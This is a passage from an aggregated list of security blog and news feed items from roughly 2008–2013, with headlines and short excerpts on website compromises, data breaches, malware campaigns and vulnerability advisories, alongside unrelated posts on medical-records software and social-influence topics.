Grepad.com attacks. While neither of these sites appear to have been using WordPress, both were hosted by Network Solutions and appear to have been published with Network Solutions Website Builder.

==> Grepad.com Iframe Nets Gov't, Niche Sites

http://blog.scansafe.com/journal/rss.xml ScanSafe traffic analysis reveals a number of government and popular niche websites have been embedded with a malicious script inserted after the closing html tag. The script first drops a cookie to identify repeat visitors, then loads an iframe pointing to grepad.com. In turn, grepad.com redirects to ginopost.com which attempts to exploit a series of vulnerabilities. Observed exploits include: * Adobe Reader and Acrobat util.printf stack-based buffer overflow (CVE-2008-2992) * Adobe Reader and Acrobat getIcon stack-based buffer overflow (CVE-2009-0927) * Office OCX OpenWebFile (BID-33243) * Symantec AppStream LaunchObj ActiveX control (CVE-2008-4388) * Hummingbird PerformUpdateAsync (CVE-2008-4728) * Peachtree ExecutePreferredApplication (CVE-2008-4699) * C6 Messenger propDownloadUrl (CVE-2008-2551) * Internet Explorer memory corruption (MS09-002) The malware host, ginopost.com, was registered on April 25th, using the same IP address (188.124.16.104) as a series of malware hosts that have been engaged in attacks on Network Solutions hosted WordPress blogs. Previous malware domains using that IP have included bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net. Attacks on WordPress-published websites have not been restricted to those hosted by Network Solutions. A separate ongoing series of attacks have also been targeted against WordPress-published sites hosted by GoDaddy.

==> The Users are smarter than we give them credit for

http://blogs.securiteam.com/index.php/feed/ So, my boss had asked me last week to read the Mandiant report and see how these Chinese APT1 attacks could be detected on a network both during and after an attack. After reading the report, I was pretty saddened by just how little has been done in the last 20 years in Infosec. The [...]

==> Western society is WEIRD [1]

http://blogs.securiteam.com/index.php/feed/ (We have the OT indicator to say that something is off topic. This isn’t, because ethics and sociology is part of our profession, but it is a fairly narrow area of interest for most. We don’t have a subject-line indicator for that This article, and the associated paper, are extremely interesting in many respects. The [...]

==> Read this book. If you have anything to do with security, read this book.

http://blogs.securiteam.com/index.php/feed/ I have been reviewing security books for over twenty years now. When I think of how few are really worthwhile that gets depressing. However, Ross Anderson is always worth reading. And when Ross Anderson first published “Security Engineering” I was delighted to be able to tell everyone that it was a worthwhile read. If you [...]

==> REVIEW: Identity Theft Manual: Practical Tips, Legal Hints, and Other Secrets Revealed, Jack Nuern

http://blogs.securiteam.com/index.php/feed/ BKIDTHMA.RVW 20120831 “Identity Theft Manual: Practical Tips, Legal Hints, and Other Secrets Revealed”, Jack Nuern, 2012 %A Jack Nuern http://www.idtheftadvocates.com %C 4901 W. 136 St., Leawood, KS, USA 66224 %D 2012 %G ASIN: B0088IG92E %I Roadmap Productions %O fax 866-594-2771 %O http://www.amazon.com/exec/obidos/ASIN/B0088IG92E/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/B0088IG92E/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/B0088IG92E/robsladesin03-20 %O Audience n- Tech 1 Writing 1 (see revfaq.htm for [...]

==> Memory lane …

http://blogs.securiteam.com/index.php/feed/ I ordered a new computer before Christmas, and there have been delays getting it. Today the shop called and said that the one I ordered (with 4 Gigs of RAM) was still short, but they did have one with 6 Gigs, if I was willing to pay an extra ten bucks. So I said fine. [...]

==> Online forum rule haikus

http://blogs.securiteam.com/index.php/feed/ On the CISSPforum we were discussing precepts for getting along and keeping the discussions meaningful. Somebody started listing rules, so I started casting them as haikus. That prompted a few more. I wondered if these were only for that group, but then realized most of them were applicable to online discussions of whatever type. So, [...]

==> Official (ISC)2 Guide to the CISSP CBK

http://blogs.securiteam.com/index.php/feed/ Recently, on the CISSPforum, there was some discussion of the new, third edition of the Official (ISC)2 Guide to the CISSP CBK (which, I note, is pretending to be available as an ebook for only ten bucks). At the end of one post, one of the correspondents stated that he was “leaning towards buying the [...]

==> The death of AV. Yet again.

http://blogs.securiteam.com/index.php/feed/ And in other news, Gunter Ollman joins in the debate as to whether Imperva’s quasi-testing is worth citing (just about) and, with more enthusiasm, whether AV is worth paying for or even still breathing. If you haven’t come across Ollman’s writings on the topic before, it won’t surprise you that the answer is no. If [...]

==> Comparison Review: AVAST! antiviral

http://blogs.securiteam.com/index.php/feed/ PCAVAST7.RVW 20120727 Comparison Review Company and product: Company: ALWIL Software Address: Trianon Office Bldg, Budejovicka 1518/13a, 140 00, Prague 4 Phone: 00 420 274 005 777 Fax: 00 420 274 005 888 Sales: +42-2-782-25-47 Contact: Kristyna Maznkov/Pavel Baudis/Michal Kovacic Email: mazankova@avast.com baudis@asw.cz Other: http://www.avast.com Product: AVAST! antiviral Summary: Multilayered Windows package Cost: unknown Rating (1-4, [...]

==> Beware! The “Metavirus”!

http://blogs.securiteam.com/index.php/feed/ In the spirit of many infosec and antivirus company “announcements” of “new threats” in the past year: A leading (if unemployed) information security and malware researcher, today noted startling developments (which were first mentioned in 1988, but we’ll leave out that bit) in cross-platform malware. Dubbed the “metavirus,” this threat could completely swamp the Internet, [...]

==> 10 Skills Needed to be a Successful Pentester

http://blogs.securiteam.com/index.php/feed/ Mastery of an operating system. I cant stress how important it is. So many people want to become hackers or systems security experts, without actually knowing the systems theyre supposed to be hacking or securing. Its common knowledge that once youre on a target/victim, you need to somewhat put on the hat of a sysadmin. [...]

==> Bell bull

http://blogs.securiteam.com/index.php/feed/ I recently re-upped with Bell Canada for cell phone service. I bought new phones and upgraded the plan to include “unlimited” text messaging (since that’s how the grandkids mostly communicate). The plan I got is supposed to include picture and video messaging. In order to use the picture messaging I am told, by both the [...]

==> Airline security

http://blogs.securiteam.com/index.php/feed/ Mom and my little sister were supposed to go on a cruise over Christmas. The first leg of their flight to the embarkation port was cancelled when a door wouldn’t close. The storm in the midwest, and the consequent meltdown of the North American air travel system, put paid to any chance of getting re-routed. [...]

==> Risks of Risk Assessment in Multiple Small Illumination Sources During Winter Conditions

http://blogs.securiteam.com/index.php/feed/ Risks of Risk Assessment in Multiple Small Illumination Sources During Winter Conditions Robert M. Slade, version 1.0, 20121220 Testing can be used to demonstrate the presence of bugs, but never their absence. - testing aphorism ABSTRACT As follow-up research to the study “Risk Assessment and Failure Analysis in Multiple Small Illumination Sources During Winter Conditions” [...]

==> “Feudal” and the young employee

http://blogs.securiteam.com/index.php/feed/ In respect of Schneier’s article on “feudalism” in security (pledging “fealty” to a company/platform, and relying on the manufacturer/vendor to keep you safe), I’m sitting in a seminar for an ERP product from one of the “giants.” The speaker has stressed that you need an “easy to use” system, since your young employees won’t attend [...]

==> M-ETH: Man in the middle – Ethernet

http://blog.wintercore.com/?feed=rss2 Over a year ago I presented at LaCon'09 a custom PCI NIC which allows to perform Man in the middle of the whole network traffic flowing through the device. The idea behind this PCI Card is onceit isplugged into a computer the whole traffic can be inspected, analyzed and, of course, modified when required in [...]

==> Vulnerability Engineering

http://blog.wintercore.com/?feed=rss2 In this article we are going to use some metrics from Software Engineering and apply them to the Vulnerability Research World. We are going to define a new term which will allow us get a probabilty showing how likely is an application to have a vulnerability during its lifetime and also will give an idea [...]

==> See Artica Demo Client and IceSphere in action

http://blog.wintercore.com/?feed=rss2 Download Video (24 mb) Do not hesitate to contact us if you need further information

==> Motorola Timbuktu’s Internet Locator Service real-time data exposed to public

http://blog.wintercore.com/?feed=rss2 We just want to make a public warning to those users of Motorola/Netopia Timbuktu Remote Control Software who are using the Internet Locator service. This service allows to locate any Timbuktu's user just by knowing the email. More than five months ago we notified Netopia's customer support (http://blog.wintercore.com/2008/04/26/things-that-shouldnt-be-there/), after discovering a hardcoded user/password pair within [...]

==> Toward a new generation of audio captchas

http://blog.wintercore.com/?feed=rss2 It seems the post "Breaking Gmail's audio Captcha" has been slashdotted so many interesting discussions have emerged as a result. It's worth noting that there is nothing specially exciting in the approach used to break the google audio captcha, merely a bunch of signal analysis and pattern recognition principles applied. Almost any Voice Recognition / [...]

==> Things that shouldn’t be there

http://blog.wintercore.com/?feed=rss2 Some days ago we released a security advisory for Realtek-curious note: according to secunia, it is the first advisory for that vendor- where a piece of code that was originally intented to be used by the engineers only, ends up being compiled in the release driver. Obviously, there is no reason to think about this [...]

==> Breaking Gmail’s Audio Captcha

http://blog.wintercore.com/?feed=rss2 A week ago I came across this interesting post at the Websense blog, anyway I guess everybody is already aware that a bot was spotted breaking Gmail's image captcha. According to the post, the success rate is about 20%, which from spammers point of view is really profitable and sure more than enough for its [...]

==> UK Is Sixth In The World As Cyber Crime Target, Cyber Security Is Not Marketed Enough

http://cyberinsecure.com/feed/ It has been suggested by UK ministers recently that there should be better awareness of theimportance of cyber security. Although conventionally, it is the more traditional generations that are wary of sharing their details in the new digital world, it is perhaps not such a bad thing to be more cautious. Jim Murphy, the Shadow [...]

==> Hijacked High-Ranked Sites Serve Malicious, Illegal Content, Blacklisted By Google

http://cyberinsecure.com/feed/ Researchers have found that Google Safe Browsing has blacklisted a number of legitimate sites after they’ve been hijacked and set up to serve malicious or illegal content. Many of them are ranked high, according to Alexa. Zscaler experts have scanned the first 1 million websites found in the Alexa top and found that 621 of [...]

==> Apple Plugs Java Hole After Flashback Trojan Creates 550,000 Strong Mac Botnet

http://cyberinsecure.com/feed/ Apple released a security update for OS X Java on Tuesday, plugging a security vulnerability exploited by the latest Flashback Trojan. The latest variant of the Mac-specific malware appeared on Monday and targeted a vulnerability in Java (CVE-2012-0507) which was patched on Windows machines more than six weeks ago. Apple’s new version of Java for [...]

==> Free Malware Scanning Service SiteInspector Launched By Comodo

http://cyberinsecure.com/feed/ Security solutions provider Comodo released a free service called SiteInspector, designed to scan websites for pieces of malware and compare them against a range of blacklisting services, such as the ones offered by Google Safe Browsing, PhishTank or Malwaredomainlist. Drive-by-download malware attacks launched from websites that fall victim to mass infections are highly common these [...]

==> US Army CECOM Website Breached, 30 Record Sets With User IDs, Clear-text Passwords, Private Data Posted On Pastebin

http://cyberinsecure.com/feed/ Black Jester, the hacker who yesterday demonstrated that he managed to gain unauthorized access to a NASA site, leaked sensitive contract information from a site connected to the US Army Communications and Electronics Command (CECOM). A number of 30 record sets that include names, user IDs, physical addresses, email addresses, telephone numbers, and clear-text passwords [...]

==> Scareware Makes Files And Folders Invisible, Demands Ransom For Repair Utility

http://cyberinsecure.com/feed/ Bitdefender experts came across a piece of scareware that makes victims believe that something may have happened to all the files and folders stored on their computers. The user is then requested to pay $80 (60 EUR) for a tool that allegedly addresses the problem. Scareware or ransomware is not uncommon, many security solutions providers [...]

==> US Security Firm Stratfor Hit By ‘Anonymous’, Clients Credit Cards And Passwords Stolen

http://cyberinsecure.com/feed/ The hacking group “Anonymous” on Sunday Christmas claimed it has stolen thousands of credit card numbers and personal information of clients of the U.S. based security think-tank Stratfor and pilfered funds it gave away as Christmas donations to charity. Anonymous said it stole information from organizations and individuals that were clients of Stratfor, including Apple [...]

==> Ultimate Bet Players Accounts Compromised, 3.5 Million Records Freely Available Online For Weeks Still In Google Cache

http://cyberinsecure.com/feed/ In a breach of security at Ultimate Bet, information from every players account had been publicly posted on the internet, revealing personal information of approximately 3.5 million poker players holding accounts at the nearly-dead poker site. A popular poker forum website posted a link to the account information via an anonymous posting, but removed the [...]

==> Restaurant Depot, Jetro Cash & Carry Processing System Compromised, Credit Cards Sold On Russian Blackmarket

http://cyberinsecure.com/feed/ If you used a credit card between the dates of Sept. 21 and Nov. 18th at national restaurant wholesalers Restaurant Depot or Jetro Cash & Carry, then you should probably know that Russian cyberthugs wearing leather blazers and gold chains and stinking of Armani Aqua di Gio are currently selling your information on the black [...]

==> InternationalCheckout.com Database Hacked, Customers Credit Cards Abused

http://cyberinsecure.com/feed/ International Checkout customers began receiving emails that alert them on the fact that the organization has recently fallen victim to a cyberattack which resulted in the theft of a large quantity of personal information, including credit card details. International Checkout was recently the victim of a system intruder who was able to access encrypted credit [...]

==> Software Offered By CNET Bundled With Trojans, Spread Through Download.com

http://cyberinsecure.com/feed/ One of the developers of a network exploration and security auditing tool called Nmap is accusing CNET of bundling free software with Trojans and shady toolbars, and serving them on their Download.com website. Gordon Lyon, also known as Fyodor claims he discovered that Nmap and other free applications such as VLC are downloaded with pieces [...]

==> Unpatched Yahoo! Messenger Flaw Allows Status Updates Remote Hijacking

http://cyberinsecure.com/feed/ Security researchers have discovered an unpatched flaw in Yahoo! Messenger that allows miscreants to change any user’s status message. Hijacked status updates are a handy way to persuade a victim’s contacts to click on a link and lead them to a dangerous website. Worse still, the bug in version 11.x of the Messenger client requires [...]

==> Adidas Websites Taken Down After Attack, Adidas.com, Reebok.com Affected

http://cyberinsecure.com/feed/ The popular sports equipment maker took down some of its websites after a security breach that targeted their network was discovered on November 3. The affected locations include adidas.com, reebok.com, miCoach.com, adidas-group.com and some local e-commerce shops. They were all taken down in order to protect the individuals that might visit them. Our preliminary investigation [...]

==> Private Canadian bleep’s Ministry Papers Dumped In Trash, Contain Names, Addresses, Birth Dates

http://cyberinsecure.com/feed/ The B.C. government is dealing with another privacy breach after confidential documents from the Ministry of bleep and Family Development were found dumped in a garbage bin. The documents were discovered dumped in a green dumpster behind a Victoria apartment building last week, and contain client names, addresses, birth dates and health card numbers. At [...]

==> Numerous Defense And Chemical Firms Targeted In Industrial Espionage Campaign

http://cyberinsecure.com/feed/ Dozens of companies in the defense and chemical industries have been targeted in an industrial espionage campaign that steals confidential data from computers infected with malware, researchers from Symantec said. At least 29 companies involved in the research, development, and manufacture of chemicals and an additional 19 firms in defense and other industries have been [...]

==> Phishing Campaign Fake Legitimate Apple Emails, Steals Victims ID And Password

http://cyberinsecure.com/feed/ A phishing campaign which involves the reputation of Apple has been seen invading inboxes. The rogue message perfectly replicates alerts received by customers when the company notifies them on changes of their accounts. A Trend Micro researcher came across a message that looked very much like the genuine message he had received not long ago [...]

==> osCommerce Compromised Sites Distribute ZeuS Spin-off Trojan, Millions Of Pages Infected

http://cyberinsecure.com/feed/ Security researchers warn that variants of a ZeuS spin-off trojan called Ice-IX are being distributed from osCommerce websites compromised during a recent mass injection attack. The attack targeting osCommerce installations vulnerable to a flaw that dates from November 2010 began at the end of July. The code injection campaign escalated quickly and the number of [...]

==> Data From 56 Law Enforcement Agencies Stolen By Antisec, 10GBs Of Emails From 300 Accounts Posted Online

http://cyberinsecure.com/feed/ Hackers associated with Anonymous’ Operation Antisec have leaked a massive cache of personal records, email messages and confidential documents belonging to law enforcement agencies. The data was obtained recently when the group hacked into a server housing 77 websites belonging to county sheriff offices and other local law enforcement organizations. The leak has been posted [...]

==> US Government Contractor ManTech Hacked, Confidential Documents Stolen And Posted Online

http://cyberinsecure.com/feed/ Anonymous has published around 400 MB of confidential documents involving ManTech, a large federal contractor which provides IT solutions to many government departments. The hacktivist collective announced plans to release the files yesterday and even posted some teaser samples to prove it means business. The full archive was eventually released in true Anonymous style, with [...]

==> U.S. Military Contractor Booz Allen Hamilton Hacked, Emails And Sensitive Data Exposed

http://cyberinsecure.com/feed/ Hackers affiliated with the Anonymous collective and its Antisec campaign have hacked into computer systems belonging to U.S. military contractor Booz Allen Hamilton and leaked sensitive data found inside. The hackers described the attack in the description of a torrent posted on ThePirateBay which also contains a list of 90,000 email addresses belonging to military [...]

==> Definitively Moved to Blogspot

http://evilcodecave.wordpress.com/feed/ Definitively Moved to Blogspot www.evilcodecave.blogspot.com

==> Fast Overview of SpyEye

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2010/02/fast-overview-of-spyeye.html

==> Rootkit Agent.adah Anatomy and Executables Carving via Cryptoanalytical Approach

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2010/01/rootkit-agentadah-anatomy-and.html

==> PHP/Spy.Bull Cryptanalysis of Encryption used and Threat Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/12/phpspybull-cryptanalysis-of-encryption.html

==> Siberia ExploitPack and PDF Exploit Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/12/siberia-exploitpack-and-pdf-exploit.html

==> DNAScan Malicious Network Activity Reverse Engineering

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/dnascan-malicious-network-activity.html

==> Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/avast-aswrdrsys-kernel-pool-corruption.html

==> PHPSpyScanBot Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/phpspyscanbot-analysis.html

==> [Crimeware] Researches Reversing about Eleonore Exploit Pack

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/crimeware-researches-about-eleonore.html

==> [Crimeware] Researches and Reversing about Eleonore Exploit Pack

http://evilcodecave.wordpress.com/feed/

==> Oracle releases new Java patch to address this week’s McRat problem

http://feeds.arstechnica.com/arstechnica/security?format=xml It's an old but necessary hatOracle says install its new security patch ASAP.

==> Critics: Substandard crypto needlessly puts Evernote accounts at risk

http://feeds.arstechnica.com/arstechnica/security?format=xml Security experts find flaws in password storage, Android app, following breach.

==> Evernote resets user passwords after being hit by “coordinated” hack

http://feeds.arstechnica.com/arstechnica/security?format=xml Breach exposes cryptographically hashed and salted passwords.

==> Apple blacklists older versions of Flash plugin due to security risk

http://feeds.arstechnica.com/arstechnica/security?format=xml Flash is the new Java. Or is that the other way around?

==> Another Java zero-day exploit in the wild actively attacking targets

http://feeds.arstechnica.com/arstechnica/security?format=xml Latest attacks used to surreptitiously install McRat trojan on victim machines.

==> “Download this gun”: 3D-printed semi-automatic fires over 600 rounds

http://feeds.arstechnica.com/arstechnica/security?format=xml And the Department of Justice says there's nothing illegal about it, either.

==> Exploit lets websites bombard visitors’ PCs with gigabytes of data

http://feeds.arstechnica.com/arstechnica/security?format=xml Chrome, IE, and Safari trick could become new form of Rick Roll.

==> Oakland mayor apologizes for promoting local lockpicking class

http://feeds.arstechnica.com/arstechnica/security?format=xml Mayor Jean Quan seems unaware that the practice is well-established among hackers.

==> Bizarre old-school spyware attacks governments, sports Mark of the Beast

http://feeds.arstechnica.com/arstechnica/security?format=xml MiniDuke pierces Adobe sandbox, uses Twitter to get instructions.

==> Adobe releases third security update this month for Flash Player

http://feeds.arstechnica.com/arstechnica/security?format=xml Latest advisory assigns top priority rating to Windows and Mac users.

==> Revealed: Stuxnet “beta’s” devious alternate attack on Iran nuke program

http://feeds.arstechnica.com/arstechnica/security?format=xml Version 0.5 shows cyberweapon development began two years earlier than thought.

==> Researchers find yet another way to get around iOS 6.1 passcode

http://feeds.arstechnica.com/arstechnica/security?format=xml It turns out there are two versions of this vulnerability in iOS 6.1.

==> Java’s latest security problems: New flaw identified, old one attacked

http://feeds.arstechnica.com/arstechnica/security?format=xml Flaw in latest Java version allows bypass of Java security sandbox.

==> Server hack prompts call for cPanel customers to take “immediate action”

http://feeds.arstechnica.com/arstechnica/security?format=xml Change root and account passwords and rotate SSH keys, company advises.

==> HTC “failed to employ reasonable security” on Android, says FTC

http://feeds.arstechnica.com/arstechnica/security?format=xml The millions of HTC tablets and phones affected must be patched within 30 days.

==> Donald Trump’s Twitter “seriously hacked,” tweets Lil Wayne lyrics

http://feeds.arstechnica.com/arstechnica/security?format=xml Couldn't happen to a nicer guy.

==> Dev site behind Apple, Facebook hacks didn’t know it was booby-trapped

http://feeds.arstechnica.com/arstechnica/security?format=xml iPhoneDevSDK says it wasn't contacted by the companies or law enforcement.

==> “il0vetheWhopper” doesn’t cut it: Twitter calls for tougher passwords

http://feeds.arstechnica.com/arstechnica/security?format=xml Burger King Twitter takeover prompts reminder.

==> How Anonymous accidentally helped expose two Chinese hackers

http://feeds.arstechnica.com/arstechnica/security?format=xml The HBGary hack offered security researchers a treasure trove of information.

==> Facebook, Twitter, Apple hack sprung from iPhone developer forum

http://feeds.arstechnica.com/arstechnica/security?format=xml The site, iphonedevsdk.com, could still be hosting exploit attacks.

==> Unusually detailed report links Chinese military to hacks against US

http://feeds.arstechnica.com/arstechnica/security?format=xml Chinese intrusions are increasingly targeting critical industrial systems.

==> Apple HQ also targeted by hackers, will release tool to protect customers

http://feeds.arstechnica.com/arstechnica/security?format=xml "There is no evidence that any data left Apple," the company says.

==> Facebook computers compromised by zero-day Java exploit

http://feeds.arstechnica.com/arstechnica/security?format=xml Facebook Chief Security Officer offers details in exclusive interview.

==> iOS 6.1 brings back bug that gives anyone access to your contacts, photos (Update)

http://feeds.arstechnica.com/arstechnica/security?format=xml The steps are complex, but a persistent hacker could access personal data.

==> How to Select a Web Host

http://feeds.feedburner.com/Docucrunch?format=xml Creating a new website? Not sure how to choose from among all the options? Need shared hosting, small business hosting, or VPS hosting? Lots of email accounts? 5-star reliability rating? Fortunately, there’s information available to help. The Best Web Hosts is great resource that will help you select the best web hosting company. It features [...]

==> Lytec MD

http://feeds.feedburner.com/Docucrunch?format=xml Lytec MD is a combination of an electronic health record and a practice management solution (Lytec 2010). It is housed on the practices server and is intended for practices that already use Lytec 2010 and want to use both EMR and PM features in one package. Lytec MD has received the ONC-ATCB 2011/2012 certification as [...]

==> Intivia InSync

http://feeds.feedburner.com/Docucrunch?format=xml Intivia InSync is electronic medical record software that allows for doctors and staff to coordinate patient care while reducing paper records and time-consuming administrative tasks. It includes all facets of an electronic medical record: document management (scanning old paper records and patient identification), electronic charts and prescribing, practice management (i.e. appointment scheduling), and medical billing. [...]

==> Meditab Intelligent Medical Software (IMS)

http://feeds.feedburner.com/Docucrunch?format=xml Meditabs Intelligent Medical Software (IMS) combine features of both electronic medical records (EMR) and practice management (PM) into one package, a so-called electronic medical office. It is suited for small, medium, and large medical practices and has various packages that are aimed toward specific specialties (i.e. pediatrics, OB/GYN, internal medicine, etc). Practices can choose to [...]

==> iSalus Healthcare OfficeEMR

http://feeds.feedburner.com/Docucrunch?format=xml iSalus Healthcare OfficeEMR is a web-based solution that combines electronic medical record features with practice management functions. It is hosted on iSalus servers so medical practices do not need to purchase any servers, software, or other relevant expenditures. Nor would they have to worry about upgrading any software. They would only need to pay a [...]

==> Noteworthy NetPractice EHRweb

http://feeds.feedburner.com/Docucrunch?format=xml Noteworthys NetPractice EHRweb is web-based electronic health software that can be used by any practice, regardless of size and specialty. Its Version 7.02.0 has received the ONC-ATCB 2011-2012 designation for Stage 1 meaningful use (which is set by the feds for reimbursement for physicians adopting EMR for their offices). Unlike a traditional EMR, EHRweb allows [...]

==> MicroMD EMR

http://feeds.feedburner.com/Docucrunch?format=xml MicroMD EMR is an electronic medical record (EMR) solution that is not only appropriate for larger practices but for smaller (even solo) practices as well. It combines electronic records and practice management into one system, and is geared toward numerous specialties, such as family practice, pediatrics, internal medicine, and obstetrics and gynecology. The MicroMD EMR [...]

==> Allscripts MyWay

http://feeds.feedburner.com/Docucrunch?format=xml Allscripts MyWay combines electronic medical records (EMR) with practice management and claims management solutions. It is intended for smaller or solo practices that do not have IT staff or do not wish to spend a lot of money on EMRs. MyWay can also be integrated with an offices current practice management software. Currently, MyWay is [...]

==> NextGen: Patient Portal

http://feeds.feedburner.com/Docucrunch?format=xml The NextGen Patient Portal is a Web-based electronic health record (EHR) system that allows patients to be more proactive about their health and physician visits. It also is intended to help busy medical offices, especially smaller practices, cut down on administrative tasks, increase revenue, and provide better quality of care. The Patient Portal is integrated [...]

==> McKesson: Medisoft Clinical

http://feeds.feedburner.com/Docucrunch?format=xml McKessons Medisoft Clinical software is a combination of both a practice management (via the Medisoft version 17 system) and electronic medical record (EMR) solution. It is intended for small practices with some limited staff that have a need to reduce time-consuming administrative tasks and still provide quality care to patients. Having recently received the Certification [...]

==> TPTI-12-05 - Oracle AutoVue ActiveX SetMarkupMode Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-06 - Hewlett-Packard Data Protector DtbClsAddObject Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-04 - Samba NDR PULL EVENTLOG ReportEventAndSourceW Heap Overflow Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-03 - Adobe Reader X True Type Font MINDEX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of an Oracle product.

==> TPTI-12-02 - Novell iPrint Client ActiveX GetPrinterURLList2 Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-01 - Oracle Java True Type Font IDEF Opcode Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-15 - Novell ZENWorks Software Packaging ISGrid.Grid2.1 bstrSearchText Parameter Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell ZENWorks. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-14 - Adobe Shockwave DEMX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-13 - McAfee SaaS myCIOScn.dll Scan Method Script Injection Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> TPTI-11-12 - McAfee SaaS MyAsUtil5.2.0.603.dll SecureObjectFactory Instantiation Design Flaw Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> How to Quickly Create New Habits in Your Life

http://feeds.feedburner.com/epistemeca A friend of mine mentioned that she was having trouble getting in the habit of going to the gym every morning, so I promised an explanation of how I have created so many beneficial habits in my life in the past year. I thought that the email that I sent her might actually be [...]

==> Matching and Mirroring (or: Cybernetic Issues in NLP)

http://feeds.feedburner.com/epistemeca One of the fundamental tenets of Neurolinguistic Programming (NLP) is the idea of “matching and mirroring” – the idea that we create rapport between individuals by mirroring aspects of their physiology in ourselves and, because they see someone who looks like them, they’re more likely to enter in to a rapportive state with us. This [...]

==> My Newest Experiment – The Kindle Book

http://feeds.feedburner.com/epistemeca A few months ago, my friend Drawk Kwast released his first ebook on the Kindle store. And he’s been having some great success (mostly because the book is awesome). Shortly after, I got my first Kindle and was fascinated by all of the low-cost and interesting self-published books on there that I wouldn’t have [...]

==> Maturity and Business

http://feeds.feedburner.com/epistemeca I wrote recently on Maturity and the way I’ve been trying to view my life lately. The place that I’ve found this thinking most interesting is in conceiving of my businesses (esp.THA). It’s easiest to try to solve most of our business problems in the frame of “what’s best for us right now?”. Especially in [...]

==> What is it to be Mature?

http://feeds.feedburner.com/epistemeca I was having a conversation with a friend the other night about maturity and social connection. We tossed around the question of what it is to be “mature”. According to Wikipedia, maturity is “how a person responds to the circumstances or environment in an appropriate and adaptive manner…. Maturity also encompasses being aware of the [...]

==> A Branding MAD Lib

http://feeds.feedburner.com/epistemeca As a new year begins, I always spend a bunch of time pondering my past, my future, and where I’m going. A big part of that is branding and positioning – who am I, and what problem do I want the people in my life to have when they think of only of me. This [...]

==> Suppressing Dissent

http://feeds.feedburner.com/epistemeca I once heard it said (and I can’t find the quote) that a society’s level of freedom isn’t determined by how it treats its normal citizens – it’s determined by how it treats those who dissent and don’t adhere to society’s norms. Nowhere do I find this more evident than in the Byron case. Look, [...]

==> Byron (and influence through the media)

http://feeds.feedburner.com/epistemeca If you’re following the Toronto news today, one of the main stories out there is about a former team member of mine, Byron Sonne. The news coverage (CNN, Yahoo) paints Byron to be one step this side of Timothy McVeigh… explosives, threatening police, etc. And that doesn’t even mention that the picture that they’re using [...]

==> Influence and Failing Kindergarten

http://feeds.feedburner.com/epistemeca Had a great chat with my friend Drawk Kwast recently that he recorded for his list of users (which was an honor given the people he usually interviews). As expected, we rambled all over the map and talked about a million different topics around influence, living an adventurous and successful life, and always being willing [...]

==> Return-to-Barry-White Human Exploitation

http://feeds.feedburner.com/epistemeca Spent a weekend in early October hanging out with Tom and Kim at their rapport and anchoring bootcamp. And I was talking in email with my friend Cris Neckar afterward where we were talking about the large number of pre-existing anchors that exist within someones already vast consciousness. Criss comment was that using pre-existing material [...]

==> NLP for Social Engineers

http://feeds.feedburner.com/epistemeca Anybody in the industry who has talked to me about NLP has understood my utter frustration about the state of NLP learning and its application to social engineering. It got me riled up enough to do a post on NLP and science a few months ago. And, for the past few months, I’ve been pondering [...]

==> Hacker Halted Redux

http://feeds.feedburner.com/epistemeca I had a blast at Hacker Halted last week, and I did a talk that I was incredibly excited about. It was the first time I was going to talk about some of the new research I’ve done and, while I didn’t plan to give out a huge number of details on the methods, I [...]

==> Recap: The Hope Symposium

http://feeds.feedburner.com/epistemeca This past weekend, I had the privilege of speaking at The Hope Symposium. It was a small conference put on by my friends over at NLP Canada. I was actually lucky enough to speak twice at the conference I was the opening speaker and the final speaker before Chris and Linda closed out the [...]

==> Social Engineering Abounds

http://feeds.feedburner.com/epistemeca I’ve been ranting for years that we need more exposure about the threat that is Social Engineering. As time goes on, we move more toward a model where the human is the prime exploit target. I just found out that some other people are thinking the same way. Today launches the first Social Engineering Framework. [...]

==> Greed as a prime motivator

http://feeds.feedburner.com/epistemeca I found this article the other day about the teen in Great Britain who managed to completely dupe a bunch of airline executives in believing that he was a millionaire who was looking to buy into their company and expand it. The key to the attack is that greed was the prime motivator in the [...]

==> Constraints and The Bandwidth Problem

